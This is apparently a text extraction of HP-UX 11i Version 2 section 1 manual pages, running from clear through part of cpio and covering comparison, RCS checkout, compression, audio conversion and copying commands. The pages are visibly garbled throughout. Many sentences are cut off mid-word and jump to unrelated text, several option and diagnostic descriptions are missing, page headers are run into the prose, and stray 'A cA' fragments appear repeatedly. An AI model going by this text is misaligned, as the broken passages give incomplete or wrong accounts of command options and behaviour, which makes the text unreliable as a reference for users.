DESCRIPTION
clear clears the terminal screen if it is possible to do so. It reads the TERM environment variable for
the terminal type, then reads the appropriate terminfo database to determine how to clear the screen.
FILES
/usr/share/lib/terminfo/?/* terminal database files
AUTHOR
clear was developed by the University of California, Berkeley.
A cA
SEE ALSO
terminfo(4).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−97
cmp(1) cmp(1)
NAME
cmp - compare two files
SYNOPSIS
cmp [-l] [-s] file1 file2 [skip1 [skip2 ]]
DESCRIPTION or decimal; the form of the
number is determined by the environment variable LC_NUMERIC (in the C locale, a leading 0 denotes an
octal number. See LANG on environ (5) and strtol (3C)).
A cA cmp recognizes the following options:
-l Print the byte number (decimal) and the differing bytes (octal) for each difference (byte
numbering begins at 1 rather than 0).
-s Print nothing for differing files; return codes only.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed. If LANG is not specified or is set to the
empty string, a default of "C" (see lang (5)) is used instead of LANG. If any internationalization variable
contains an invalid setting, cmp behaves as if all internationalization variables are set to "C". See
environ (5).
DIAGNOSTICS
cmp returns the following exit values:
0 Files are identical.
1 Files are not identical.
2 Inaccessible or missing argument.
cmp prints the following warning if the comparison succeeds till the end of file of file1(file2) is reached.
cmp: EOF on file1(file2)
SEE ALSO
comm(1), diff(1).
STANDARDS CONFORMANCE
cmp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−98 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
co(1) co(1)
NAME
co - check out RCS revisions
SYNOPSIS
co [ options ] file ...
DESCRIPTION reading or processing (e.g., compiling) need not be locked. A revision
checked out for editing and later checked in must normally be locked. Locking a revision currently
locked by another user fails (a lock can be broken with the rcs command, but poses inherent risks when
A cA
independent changes are being made simultaneously (see rcs (1)). co with locking requires the caller to
be on the access list of the RCS file unless: he is the owner of the file, a user with appropriate privileges,
or the access list is empty. co without locking is not subject to access list restrictions.
A revision is selected by number, check-in date/time, author, or state. If none of these options are
specified, the latest revision on the trunk is retrieved. When the options are applied in combination, the
latest revision that satisfies all of them is retrieved. The options for date/time, author, and state retrieve
a revision on the selected branch. The selected branch is either derived from the revision number (if
given), or is the highest branch on the trunk. A revision number can be attached to the options -l, -p,
-q, or -r.
The caller of the command must have write permission in the working directory, read permission for the
RCS file, and either read permission (for reading) or read/write permission (for locking) in the directory
that contains the RCS file.
The working file inherits the read and execute permissions from the RCS file. In addition, the owner
write permission is turned on, unless the file is checked out unlocked and locking is set to strict (see
rcs (1)).
If a file with the name of the working file exists already and has write permission, co aborts the check
out if -q is given, or asks whether to abort if -q is not given. If the existing working file is not writable,
it is deleted before the check out.
A number of temporary files are created. A semaphore file is created in the directory of the RCS file to
prevent simultaneous update.
A co command applied to an RCS file with no revisions creates a zero-length file. co always performs
keyword substitution (see below).
Options
-l[ rev ] Locks the checked out revision for the caller. If omitted, the checked out revision is not
locked. See option -r for handling of the revision number rev .
-p[ rev ] Prints the retrieved revision on the standard output rather than storing it in the working
file. This option is useful when co is part of a pipe.
-q[ rev ] Quiet mode; diagnostics are not printed.
-ddate Retrieves the latest revision on the selected branch whose check in date/time is less than
or equal to date . The date and time may be given in free format and are converted to
local time. Examples of formats for date :
Tue-PDT, 1981, 4pm Jul 21 (free format)
Fri April 16 15:52:25 EST 1982 (output of ctime(3C))
4/21/86 10:30am (format: mm/dd/yy hh:mm:ss)
Most fields in the date and time can be defaulted. co determines the defaults in the
order year, month, day, hour, minute, and second (from most- to least-significant). At
least one of these fields must be provided. For omitted fields that are of higher
significance than the highest provided field, the current values are assumed. For all
other omitted fields, the lowest possible values are assumed. For example, the date 20,
10:30 defaults to 10:30:00 of the 20th of the current month and current year. Date/time
fields can be delimited by spaces or commas. If spaces are used, the string must be sur-
rounded by double quotes.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−99
co(1) co(1)
For 2-digit year input (yy) without the presence of the century field, the following
interpretation is taken: [70-99, 00-69 (1970-1999, 2000-2069)].
-r[ rev ] Retrieves the latest revision whose number is less than or equal to rev . If rev indicates a
branch rather than a revision, the latest revision on that branch is retrieved. rev is com-
posed of one or more numeric or symbolic fields separated by . . The numeric equivalent
of a symbolic field is specified with the ci -n and rcs -n commands (see ci (1) and
rcs (1)).
-sstate Retrieves the latest revision on the selected branch whose state is set to state .
-w[ login ] Retrieves the latest revision on the selected branch that was checked in by the user with
login name login . If the argument login is omitted, the caller’s login is assumed.
-jjoinlist Generates a new revision that is the result of the joining of the revisions on joinlist . join-
A cA list is a comma-separated list of pairs of the form rev2:rev3, where rev2 and rev3 are
(symbolic or numeric) revision numbers. For the initial pair, rev1 denotes the revision
selected by the options -l, ..., -w. For all other pairs, rev1 denotes the revision gen-
erated ances-
tor. If rev1 < rev2 < rev3 on the same branch, joining generates a new revision that is
similar to rev3 , but with all changes that lead from rev1 to rev2 undone. If changes from
rev2 to rev1 overlap with changes from rev2 to rev3 , co prints a warning and includes
the overlapping sections, delimited as follows:
<<<<<<<
rev1
=======
rev3
>>>>>>>
For the initial pair, rev2 can be omitted. The default is the common ancestor. If any of
the arguments indicate branches, the latest revisions on those branches are assumed. If
the -l option is present, the initial rev1 is locked.
Keyword Substitution check out, co replaces these strings with
strings of the form $keyword : value $. If a revision containing strings of the latter form is checked back
in, the value fields are replaced during the next checkout. Thus, the keyword values are automatically
updated on checkout.
Keywords and their corresponding values:
$Author$ The login name of the user who checked in the revision.
$Date$ The date and time the revision was checked in.
$Header$ A standard header containing the RCS file name, the revision number, the date, the
author, and the state.
$Locker$ The login name of the user who locked the revision (empty if not locked).
$Log$ The log message supplied during checkin, preceded by a header containing the RCS file
name, the revision number, the author, and the date. Existing log messages are not
replaced. Instead, the new log message is inserted after $Log:... $. This is useful for
accumulating a complete change log in a source file.
$Revision$ The revision number assigned to the revision.
$Source$ The full pathname of the RCS file.
$State$ The state assigned to the revision with rcs -s or ci -s.
Section 1−−100 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
co(1) co(1)
DIAGNOSTICS
The RCS file name, the working file name, and the revision number retrieved are written to the diagnostic
output. The exit status always refers to the last file checked out, and is 0 if the operation was successful,
1 if unsuccessful.
EXAMPLES
Assume the current directory contains a subdirectory named RCS with an RCS file named io.c,v.
Each of the following commands retrieves the latest revision from RCS/io.c,v and stores it into io.c:
co io.c
co
co
RCS/io.c,v
io.c,v A cA
co io.c RCS/io.c,v
co io.c io.c,v
co RCS/io.c,v io.c
co io.c,v io.c
co -r1.1 foo.c,v
Check out version 1.1 of RCS file foo.c,v to the standard output:
co -p1.1 foo.c,v
Check out the version of file foo.c,v that existed on September 18, 1992:
co -d"09/18/92" foo.c,v
WARNINGS
The co command generates the working file name by removing the ,v from the end of the RCS file
name. If the given RCS file name is too long for the file system on which the RCS file should reside, co
terminates with an error message.
There is no way to suppress the expansion of keywords, except by writing them differently. In nroff
and troff, this is done by embedding the null-character \& into the keyword.
The -d option gets confused in some circumstances, and accepts no date before 1970.
The -j option does not work for files containing lines consisting of a single . .
RCS is designed to be used with text files only. Attempting to use RCS with non-text (binary) files results
in data corruption.
AUTHOR
co was developed by Walter F. Tichy.
SEE ALSO
ci(1), ident(1), rcs(1), rcsdiff(1), rcsmerge(1), rlog(1), rcsfile(4), acl(5), rcsintro(5).
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−101
col(1) col(1)
NAME
col - filter reverse line-feeds and backspaces
SYNOPSIS
col [-blfxp]
DESCRIPTION com-
mand, and output resulting from use of the tbl preprocessor (see nroff(1) and tbl (1)).
If the -b option is given, col assumes that the output device in use is not capable of backspacing. In
A cA this case, if two or more characters are to appear in the same place, only the last one read is output.
If the -l option is given, col assumes the output device is a line printer (rather than a character
printer) and removes backspaces in favor of multiply overstruck full lines. It generates the minimum
number of print operations necessary to generate the required number of overstrikes. (All but the last
print operation on a line are separated by carriage returns (\r); the last print operation is terminated by
a newline ( converts white space to tabs on output wherever possible to shorten
printing time.
The ASCII control characters SO (\016) and SI (\01 accepted are space, backspace, tab, return, new-line, SI , SO , and VT
, (\013), and ESC followed by 7, 8, or 9. The VT character is an alternate form of full reverse line-feed,
included for compatibility with some earlier programs of this type. All other non-printing characters are
ignored.
Normally, col ignores any unrecognized escape sequences found in its input; the -p option can be used
to cause col to output these sequences as regular characters, subject to overprinting from reverse line
motions. The use of this option is highly discouraged unless the user is fully aware of the textual position
of the escape sequences.
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, col102 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
col(1) col(1)
EXAMPLES
col is used most often with nroff and tbl. A common usage is:
tbl filename | nroff -man | col | more -s
(very similar to the usual man(1) command). This command allows vertical bars and outer boxes to be
printed for tables. The file is run through the tbl preprocessor, and the output is then piped through
nroff, formatting the output using the -man macros. The formatted output is then piped through col,
which sets up the vertical bars and aligns the columns in the file. The file is finally piped through the
more command, which prints the output to the screen with underlining and highlighting substituted for
italic and bold typefaces. The -s option deletes excess space from the output so that multiple blank lines
are not printed to the screen.
SEE ALSO
nroff(1), tbl(1), ul(1), man(5). A cA
NOTES
The input format accepted by col matches the output produced by nroff with either the -T37 or -
Tlp options. Use -T37 (and the -f option of col) if the ultimate disposition of the output of col is a
device that can interpret half-line motions, and -Tlp otherwise.
BUGS
Cannot back up more than 128 lines. Cannot back up across page boundaries.
There is a maximum limit for the number of characters, including backspaces and overstrikes, on a line.
The maximum limit is at least 800 characters.
Local vertical motions that would result in backing up over the first line of the document are ignored. As
a result, the first line must not have any superscripts.
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ systems.
STANDARDS CONFORMANCE
col: SVID2, SVID3, XPG2, XPG3
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−103
comb(1) comb(1)
NAME
comb - combine SCCS deltas
SYNOPSIS
comb [-p SID ] [-clist ] [-o] [-s] file ...
DESCRIPTION pro-
A cA cessed; non-SCCS files and unreadable files are silently ignored. The generated shell procedure is written
on the standard output.
Options
comb recognizes the following options. Each is explained as if only one named file is to be processed, but
the effects of any option apply independently to each named file.
-pSID The S CCS origi-
nal file.
-s This option causes comb to generate a shell procedure which, when run, produces a
report giving, for each file: the file name, size (in blocks) after combining, original
size (also in blocks), and percentage change computed by:
100 × (original − combined) / original
It is recommended that this option be used before any SCCS files are actually com-
bined to determine exactly how much space is saved by the combining process.
If no options are specified, comb preserves only leaf deltas and the minimal number of ancestors needed
to preserve the tree.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
DIAGNOSTICS
Use sccshelp (1) for explanations.
EXAMPLES
comb may rearrange the shape of the tree of deltas. Combining files may or may not save space; in fact,
it is possible for the reconstructed file to actually be larger than the original.
Section 1−−104 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
comb(1) comb(1)
FILES
s.COMB????? Temporary file
comb????? Temporary file
SEE ALSO
admin(1), delta(1), get(1), sccshelp(1), prs(1), sh(1), sccsfile(4).
A cA
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−105
comm(1) comm(1)
NAME
comm - select or reject lines common to two sorted files
SYNOPSIS
comm [-[123] ] file1 file2
DESCRIPTION
comm reads file1 and file2 , which should be ordered in increasing collating sequence (see sort (1) and
Environment Variables below), and produces a three-column output:
Column 1: Lines that appear only in file1 ,
Column 2: Lines that appear only in file2 ,
Column 3: Lines that appear in both files.
A cA If - is used for file1 or file2 , the standard input is used.
Options 1, 2, or 3 suppress printing of the corresponding column. Thus comm -12 prints only the lines
common to the two files; comm -23 prints only lines in the first file but not in the second; comm -123
does nothing useful.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence comm expects from the input files.
LC_MESSAGES determines the language in which messages are displayed.
If LC_MESSAGES is not specified in the environment or is set to the empty string, the value of LANG
determines the language in which messages are displayed. inter-
nationalization variable contains an invalid setting, comm behaves as if all internationalization variables
are set to ‘‘C’’. See environ (5).
EXAMPLES
The following examples assume that file1 and file2 have been ordered in the collating sequence
defined by the LC_COLLATE or LANG environment variable.
Print all lines common to file1 and file2 (in other words, print column 3):
comm -12 file1 file2
Print all lines that appear in file1 but not in file2 (in other words, print column 1):
comm -23 file1 file2
Print all lines that appear in file2 but not in file1 (in other words, print column 2):
comm -13 file1 file2
SEE ALSO
cmp(1), diff(1), sdiff(1), sort(1), uniq(1).
STANDARDS CONFORMANCE
comm: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−106 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
command(1) command(1)
NAME
command - execute a simple command
SYNOPSIS
command command_name [ argument ... ]
DESCRIPTION
command enables the shell to treat the arguments as a simple command, suppressing the shell function
lookup.
If command_name is not the name of the function, the effect of command is the same as omitting com-
mand.
OPERANDS
command recognizes the following operands: A cA
command_name The name of a HP-UX command or a shell built-in command.
argument One or more strings to be interpreted as arguments to command_name .
The command command is necessary to allow functions that have the same name as a command to call
the command (instead of a recursive call to the function).
Nothing in the description of command is intended to imply that the command line is parsed any
differently than any other simple command. For example,
command a | b ; c
is not parsed in any special way that causes | or ; to be treated other than a pipe operator or semicolon
or that prevents function lookup on b or c.
EXTERNAL INFLUENCE
Environment Variables
PATH determines the search path used during the command search.
RETURN VALUE
command exits with one of the following values:
• If command fails:
126 The utility specified by the command_name is found but not executable.
127 An error occurred in the command utility or the utility specified by
command_name is not found.
• If command does not fail:
The exit status of command is the same as that of the simple command specified by the
arguments:
command_name [ argument ... ]
EXAMPLES
Create a version of the cd command that always prints the name of the new working directory whenever
it is used:
cd() {
command "$@" >/dev/null
pwd
}
Circumvent the redefined cd command above, and change directories without printing the name of the
new working directory:
command cd
SEE ALSO
getconf(1), sh-posix(1), confstr(3C).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−107
command(1) command(1)
STANDARDS CONFORMANCE
command: XPG4, POSIX.2
A cA
Section 1−−108 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
compact(1) compact(1)
NAME
compact, uncompact, ccat - compact and uncompact files, and cat them
SYNOPSIS
compact [ name ...]
uncompact [ name ...]
ccat [ file ...]
DESCRIPTION
compact compresses the named files using an adaptive Huffman code. If no file names are given, stan-
dard input is compacted and sent to the standard output. compact operates as an on-line algorithm.
Each time a byte is read, it is encoded immediately according to the current prefix code. This code is an
optimal Huffman code for the set of frequencies seen so far. It is unnecessary to attach a decoding tree in A cA
front of the compressed file because the encoder and the decoder start in the same state and stay syn-
chronized. Furthermore, compact and uncompact can operate as filters. In particular,
... | compact | uncompact | ...
operates as a (very slow) no-op.
When an argument file is given, it is compacted, the resulting file is placed in file .C, and file is unlinked.
The first two bytes of the compacted file code the fact that the file is compacted. These bytes are used to
prohibit recompaction.
The amount of compression to be expected depends on the type of file being compressed. Typical file size
reduction (in percent) through compression are: Text, 38%; Pascal Source, 43%; C Source, 36%; and
Binary, 19%.
uncompact restores the original file from a file compressed by compact. If no file names are specified,
standard input is uncompacted and sent to the standard output.
ccat cats the original file from a file compressed by compact, without uncompressing the file.
WARNINGS
On short-filename systems, the last segment of the file name must contain 12 or fewer characters to allow
space for the appended .C.
DEPENDENCIES
NFS
Access control list entries of networked files are summarized (as returned in st_mode by stat()), but
not copied to the new file (see stat (2)).
AUTHOR
compact was developed by Colin L. Mc Master.
FILES
*.C compacted file created by compact, removed by uncompact
SEE ALSO
compress(1), pack(1), acl(5), aclv(5).
Gallager, Robert G., ‘‘Variations on a Theme of Huffman,’’ I.E.E.E. Transactions on Information Theory ,
vol. IT-24, no. 6, November 1978, pp. 668 - 674.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−109
compress(1) compress(1)
NAME
compress, uncompress, zcat, compressdir, uncompressdir - compress and expand data
SYNOPSIS
Compress Files
compress [-d] [-f|-z] [-z] [-v] [-c] [-V] [-b maxbits ] [ file ... ]
uncompress [-f] [-v] [-c] [-V] [ file ... ]
zcat [-V] [ file ... ]
DESCRIPTION
The following commands compress and uncompress files and directory subtrees as indicated:
compress Reduce the size of the named file s using adaptive Lempel-Ziv coding. If reduc-
tion file s to original form. Resulting files have the original
filename, ownership, and permissions, and the .Z filename suffix is removed.
If no file is specified, or if - is specified, standard input is uncompressed to the
standard output.
zcat Restore the compressed file s-
bits ) per code, and the distribution of common substrings. Typically, text such as source code or English
is reduced by 50-60 percent. Compression is generally much better than that achieved by Huffman cod-
ing .
Section 1−−110 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
compress(1) compress(1), compress, uncompress, and zcat
behave as if all internationalization variables are set to "C". See environ (5).
RETURN VALUE
These commands return the following values upon completion:
0 Completed successfully.
2 Last file is larger after (attempted) compression.
1 An error occurred.
DIAGNOSTICS
Usage: compress [-f|-z] [-dvcV] [ sys-
tem on which the source file resides. Make the source file name shorter and try again.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−111
compress(1) compress(1).
SEE ALSO
compact(1), pack(1), acl(5).
STANDARDS CONFORMANCE
compress: XPG4
Section 1−−112 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
compress(1) compress(1)
A cA
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−113
convert(1) convert(1)
NAME
convert - convert an audio file
SYNOPSIS
/opt/audio/bin/convert [source_file ] [target_file ] [-sfmt format ] [-dfmt format ]
[-ddata data_type ] [-srate rate ] [-drate rate ]
[-schannels number] [-dchannels number]
DESCRIPTION
This command converts audio files from one supported file format, data format, sampling rate, and
number of channels to another. The unconverted file is retained as a source file.
-sfmt format -dfmt format
A cA are the file formats for the source and destination files. Each format can be one of these:
au Sun file format
snd NeXT file format
wav Microsoft RIFF Waveform file format
u MuLaw format
al ALaw
l16 linear 16-bit format
lo8 offset (unsigned) linear 8-bit format
l8 linear 8-bit format
If you omit -sfmt, convert uses the header or filename extension in the source file. You can
omit -dfmt if you supply a filename extension for the destination file.
-ddata data_type
is the data type for the destination files. data_type can be one of these:
u MuLaw
al ALaw
l16 linear 16-bit
lo8 offset (unsigned) linear 8-bit data
l8 linear 8-bit data
If you omit -ddata, convert uses an appropriate data type, normally the data type of the source
file.
-srate rate -drate rate
are the number of samples per second for the source and destination file. Typical sampling rates
range from 8 to 11k (for voice quality) to 44,100 (for CD quality). You can use k to indicate
thousands. For example, 8k means 8,000 samples per second.
If you omit -srate, convert uses a rate defined by the source file header or its filename exten-
sion. For a raw file with no extension, 8,000 is used. By playing the file, you can determine if 8,000
samples is too fast or too slow.
If you omit -drate, convert uses a sampling rate appropriate for the destination file format; if
possible, it matches the sampling rate of the source file.
-schannels number -dchannels number
are the number of channels in the source and destination files. Use 1 for mono; 2 for stereo. If -
schannels is omitted, convert uses the information in the header; for raw data files, it uses
mono.
If -dchannels is omitted, convert matches what was used for the source file (through the
header or -schannels option); for raw data files, it uses mono.
EXAMPLES
Convert a raw data file to a headered file.
Section 1−−114 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
convert(1) convert(1)
cd /opt/audio/bin
convert beep.l16 beep.au
Convert a raw data file to a headered file when the source has no extension, was sampled at 11,025 per
second, and has stereo data.
cd /opt/audio/bin
convert beep beep.au -sfmt l16 -srate 11025 -schannels 2
To save disk space, convert an audio file with CD quality sound to voice quality sound.
cd /opt/audio/bin
convert idea.au idea2.au -ddata u -drate 8k -dchannels 1
AUTHOR
convert was developed by HP. A cA
Sun is a trademark of Sun MicroSystems, Inc.
NeXT is a trademark of NeXT Computers, Inc.
Microsoft is a trademark of Microsoft Corporation.
SEE ALSO
audio(5), asecure(1M), aserver(1M), attributes(1), send_sound(1).
Using the Audio Developer’s Kit
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−115
cp(1) cp(1)
NAME
cp - copy files and directory subtrees
SYNOPSIS
cp [-f-i] [-p] [-e extarg ] file1 new_file
cp [-f-i] [-p] [-e extarg ] file1 [file2 ... ] dest_directory
cp [-f-i] [-p] [-R-r] [-e extarg ] directory1 [ directory2 ... ] dest_directory
DESCRIPTION
cp copies:
• file1 to new or existing new_file ,
•
A cA •
file1 to existing dest_directory,
file1 , file2 , ... to existing dest_directory,
• directory subtree directory1 , to new or existing dest_directory. or
• multiple directory subtrees directory1 , directory2 , ... to new or existing dest_directory.
cp fails if file1 and new_file are the same (be cautious when using shell metacharacters). When destina-
tion is a directory, one or more files are copied into that directory. If two or more files are copied, the des-
tination must be a directory. When copying a single file to a new file, if new_file exists, its contents are
destroyed.
If the access permissions of the destination dest_directory or existing destination file new_file forbid writ-
ing, cp aborts and produces an error message ‘‘cannot create file ’’.
To copy one or more directory subtrees to another directory, the -r option is required. The -r option is
ignored if used when copying a file to another file or files to a directory.
If new_file is a link to an existing file with other links, cp overwrites the existing file and retains all
links. If copying a file to an existing file, cp does not change existing file access permission bits, owner,
or group.. The last modification time of new_file (and last access time, if new_file did not
exist) and the last access time of the source file1 are set to the time the copy was made.
Options
-i (interactive copy) Cause cp to write a prompt to standard error and wait for a response before
copying a file that would overwrite an existing file. If the response from the standard input is
affirmative, the file is copied if permissions allow the copy. If the -i (interactive) and -f
(forced-copy) options are both specified, the -i option is ignored.
-f Force existing destination pathnames to be removed before copying, without prompting for
confirmation. This option has the effect of destroying and replacing any existing file whose name
and directory location conflicts with the name and location of the new file created by the copy
operation.
-p (preserve permissions) Causes cp to preserve in the copy as many of the modification time,
access time, file mode, user ID, and group ID as allowed by permissions.
-r (recursive subtree copy) Cause cp to copy the subtree rooted at each source directory to
dest_directory. If dest_directory exists, it must be a directory, in which case cp creates a direc-
tory within dest_directory with the same name as file1 and copies the subtree rooted at file1 to
dest_directory/file1 . An error occurs if dest_directory/file1 already exists. If dest_directory does
not exist, cp creates it and copies the subtree rooted at file1 to dest_directory. Note that cp
-r cannot merge subtrees.
Usually normal files and directories are copied. Character special devices, block special devices,
network special files, named pipes, symbolic links, and sockets are copied, if the user has access
to the file; otherwise, a warning is printed stating that the file cannot be created, and the file is
skipped.
dest_directory should not reside within directory1 , nor should directory1 have a cyclic directory
structure, since in both cases cp attempts to copy an infinite amount of data.
Section 1−−116 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
cp(1) cp(1)
-R (recursive subtree copy) The -R option is identical to the -r option with the exception that
directories copied by the -R option are created with read, write, and search permission for the
owner. User and group permissions remain unchanged.
With the -R and -r options, in addition to regular files and directories, cp also copies FIFOs,
character and block device files and symbolic links. Only superusers can copy device files. All
other users get an error. Symbolic links are copied so the target points to the same location that
the source did.
Warning: While copying a directory tree that has device special files, use the -r option; other-
wise, an infinite amount of data is read from the device special file and is duplicated as a special
file in the destination directory occupying large file system space.
-e extarg
Specifies the handling of any extent attributes of the file[s] to be copied. extarg takes one of the
following values.
A cA
warn Issues a warning message if extent attributes cannot be copied, but copies the
file anyway.
ignore Does not copy the extent attributes.
force Fails to copy the file if the extent attribute can not be copied.
Extent attributes can not be copied if the files are being copied to a file system which does not
support extent attributes or if that file system has a different block size than the original. If -e
is not specified, the default value for extarg is warn.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters.
LANG and LC_CTYPE determine the local language equivalent of y (for yes/no queries)., cp behaves as if all internationalization variables are set to "C". See environ (5).
EXAMPLES
The following command moves the directory sourcedir and its contents to a new location (targetdir ) in the
file system. Since cp creates the new directory, the destination directory targetdir should not already
exist.
cp -r sourcedir targetdir && rm -rf sourcedir
The -r option copies the subtree (files and subdirectories) in directory sourcedir to directory targetdir .
The double ampersand (&&) causes a conditional action. If the operation on the left side of the && is
successful, the right side is executed (and removes the old directory). If the operation on the left of the
&& is not successful, the old directory is not removed.
This example is equivalent to:
mv sourcedir targetdir
To copy all files and directory subtrees in the current directory to an existing targetdir , use:
cp -r * targetdir
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−117
cp(1) cp(1)
DEPENDENCIES
NFS
Access control lists of networked files are summarized (as returned in st_mode by stat()), but not
A cA copied to the new file. When using mv or ln on such files, a + is not printed after the mode value when
asking for permission to overwrite a file.
AUTHOR
cp was developed by AT&T, the University of California, Berkeley, and HP.
SEE ALSO
cpio(1), ln(1), mv(1), rm(1), link(1M), lstat(2), readlink(2), stat(2), symlink(2), symlink(4), acl(5), aclv(5).
STANDARDS CONFORMANCE
cp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−118 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
cpio(1) cpio(1)
NAME
cpio - copy file archives in and out; duplicate directory trees
SYNOPSIS
cpio -o [-e extarg ] [achvxABC]
cpio -i[bcdfmrstuvxBPRSU6] [pattern ...]
cpio -p [-e extarg ] [adlmruvxU] directory
DESCRIPTION
The cpio command saves and restores archives of files on magnetic tape, other devices, or a regular file,
and copies files from one directory to another while replicating the directory tree structure. When cpio
completes processing the files, it reports the number of blocks written.
cpio -o (copy out, export) Read standard input to obtain a list of path names, and copy those files to
A cA
standard output together with path name and status information. The output is padded to a
512-byte boundary.
cpio -i (copy in, import) Extract files from standard input, which is assumed to be the result of a
previous cpio -o.
If pattern ..., is specified, only the files with names that match a pattern according to the
rules of Pattern Matching Notation (see regexp (5)) are selected. A leading ! on a pattern
indicates that only those names that do not match the remainder of the pattern should be
selected. Multiple patterns can be specified. The patterns are additive. If no pattern is
specified, the default is * (select all files). See the f option, as well.
Extracted files are conditionally created and copied into the current directory tree, as deter-
mined by the options described below. The permissions of the files match the permissions of
the original files when the archive was created by cpio -o unless the U option is used.
File owner and group are that of the current user unless the user has appropriate privileges,
in which case cpio retains the owner and group of the files of the previous cpio -o.
cpio -p (pass through) Read standard input to obtain a list of path names of files which are then
conditionally created and copied into the destination directory tree as determined by the
options described below. directory must exist. Destination path names are interpreted rela-
tive to directory .
With the -p option, when handling a link, only the link is passed and no data blocks are
actually read or written. This is especially noteworthy with cpio -pl, where it is very
possible that all the files are created as links, such that no blocks are written and "0 blocks"
is reported by cpio. (See below for a description of the -l option.)
Options
cpio recognizes the following options, which can be appended as appropriate to -i, -o, and -p. White
space and hyphens are not permitted between these options and -i, -o, or -p.
a Reset access times of input files after they are copied.
b Swap both bytes and half-words. Use only with -i. See the P option for details; see also
the s and S options.
c Write or read header information in ASCII character form for portability.
d Create directories as needed.
-e extarg
Specifies the handling of any extent attributes of the file(s) to be archived or copied.
extarg takes one of the following values.
warn Archive or copy the file and issue a warning message if extent attributes can-
not be preserved.
ignore Do not issue a warning message even if extent attributes cannot be preserved.
force Any file(s) with extent attributes will not be archived and a warning message
will be issued.
When using the -o option, extent attributes are not preserved in the archive. Further-
more, the -p option will not preserve extent attributes if the files are being copied to a
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−119
cpio(1) cpio(1)
file system that does not support extent attributes. If -e is not specified, the default
value for extarg is warn.
f Copy in all files except those selected by pattern ....
h Follow symbolic links as though they were normal files or directories. Normally, cpio
archives the link.
l Whenever possible, link files rather than copying them. This option does not destroy
existing files. Use only with -p.
m Retain previous file modification time. This option does not affect directories that are
being copied.
r Rename files interactively. If the user types a null line, the file is skipped.
A cA s Swap all bytes of the file. Use only with -i. See the P option for details; see also the s
and S options.
t Print only a table of contents of the input. No files are created, read, or copied.
u Copy unconditionally (normally, an older file does not replace a newer file with the same
name).
v Print a list of file names as they are processed. When used with the modified, and filename is the path name of the file as recorded in
the archive.
x Save or restore device special files. Since mknod() is used to recreate these files on a
restore, -ix and -px can be used only by users with appropriate privileges (see
mknod(2)). This option is intended for intrasystem (backup) use only. Restoring device
files from previous versions of the OS, or from different systems can be very dangerous.
cpio may prevent the restoration of certain device files from the archive.
A Suppress warning messages regarding optional access control list entries. cpio does not
back up optional access control list entries in a file’s access control list (see acl (5)). Nor-
mally, a warning message is printed for each file that has optional access control list
entries.
B Block input/output at 5120 bytes to the record (does not apply to cpio -p). This option
is meaningful only with data directed to or from devices that support variable-length
records such as magnetic tape.
C Have cpio checkpoint itself at the start of each volume. If cpio is writing to a stream-
ing tape drive with immediate-report mode enabled and a write error occurs, it normally
aborts and exits with return code 2. With this option specified, cpio instead automati-
cally restarts itself from the checkpoint and rewrites the current volume. Alternatively,
if cpio is not writing to such a device and a write error occurs, cpio normally continues
with the next volume. With this option specified, however, the user can choose to either
ignore the error or rewrite the current volume.
P Read a file written on a PDP-11 or VAX system (with byte-swapping) that did not use the
c option. Use only with -i. Files copied in this mode are not changed. Non-ASCII files
are likely to need further processing to be readable. This processing often requires
knowledge of file contents, and thus cannot always be done by this program. The b, s,
and S options can be used when swapping all the bytes on the tape (rather than just in
the headers) is appropriate. In general, text is best processed with P and binary data
with one of the other options.
R Resynchronize automatically when cpio goes "out of phase", (see the DIAGNOSTICS
section).
S Swap all half-words in the file. Use only with -i. See the P option for details; see also
the b and s options.
Section 1−−120 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
cpio(1) cpio(1)
U Use the process’s file-mode creation mask (see umask(2)) to modify the mode of files
created, in the same manner as creat (2).
6 Process a UNIX Sixth-Edition-format file. Use only with -i.
Note that cpio archives created using a raw device file must be read using a raw device file.
When the end of the tape is reached, cpio prompts the user for a new special file and continues.
If you want to pass one or more metacharacters to cpio without the shell expanding them, be sure to
precede each of them with a backslash (\).
Device files written with the -ox option (such as /dev/tty03) do not transport to other implementa-
tions of HP-UX.
EXTERNAL INFLUENCES
Environment Variables
A cA
LC_COLLATE determines the collating sequence used in evaluating pattern matching notation for file
name generation.
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters, and the charac-
ters matched by character class expressions in pattern matching notation.
